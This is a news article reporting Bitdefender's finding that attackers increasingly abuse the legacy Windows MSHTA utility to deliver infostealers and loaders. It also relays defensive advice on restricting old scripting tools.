‘This reveals a broader security problem’: Experts warn that a key Microsoft tool is still being misused to launch malware campaigns.

Bitdefender is reporting increasing misuse of the old MSHTA utility to spread information-stealing and loading malware.
Campaigns range from simple commodity threats like LummaStealer to advanced persistence tools like PurpleFox.
Defenders are advised to restrict outdated scripting utilities and deploy layered security controls to detect malicious scripting activity.

Cybercriminals are increasingly using an old, legitimate Windows tool to deploy information-stealing and loading malware, researchers say.

A new Bitdefender report claims that since the start of 2026, there has been an uptick in activity related to a Windows utility called Microsoft HTML Application Host (MSHTA), a legitimate utility that runs special HTML application files called HTA.

While normal web pages are opened in a browser, HTA files interact directly with the Windows operating system and can execute scripts with elevated privileges.

Simple and complex threats

MSHTA is an old tool originally designed for light office and administrative tasks, but like many other existing tools, is misused to run malicious scripts, download malware, or bypass security controls.

“Since the beginning of the year, we have seen an increase in MSHTA-related activities,” Bitdefender said. “As legitimate use of this utility is gradually fading, this trend likely reflects an increase in malicious activity rather than new administrative adoption. »

The activity analyzed by the researchers spans multiple categories of malware, they further explained, saying they saw both simple and more complex campaigns. On the “simpler” side, MSHTA is widely used to provide infostealers such as Amatera or LummaStealer. It is also used for loaders such as CountLoader or Emmenthal.

When it comes to more advanced and persistent threats, Bitdefender has seen crooks deploy ClipBanker and PurpleFox.

“This range of abuse demonstrates why MSHTA continues to be important to defenders: it is not a single malware family or intrusion model,” they explained. “It remains useful in everything from opportunistic malware distribution to long-term compromise. »

To defend against MSHTA-based attacks, organizations must ensure both user awareness and multi-layered security controls, it was said. Users should avoid downloading untrusted files or running suspicious commands, while organizations should deploy security tools that can detect malicious scripts or command line abuse.

The company also recommends restricting utilities such as mshta.exe and wscript.exe when possible and replacing outdated scripting tools with modern alternatives to reduce the attack surface.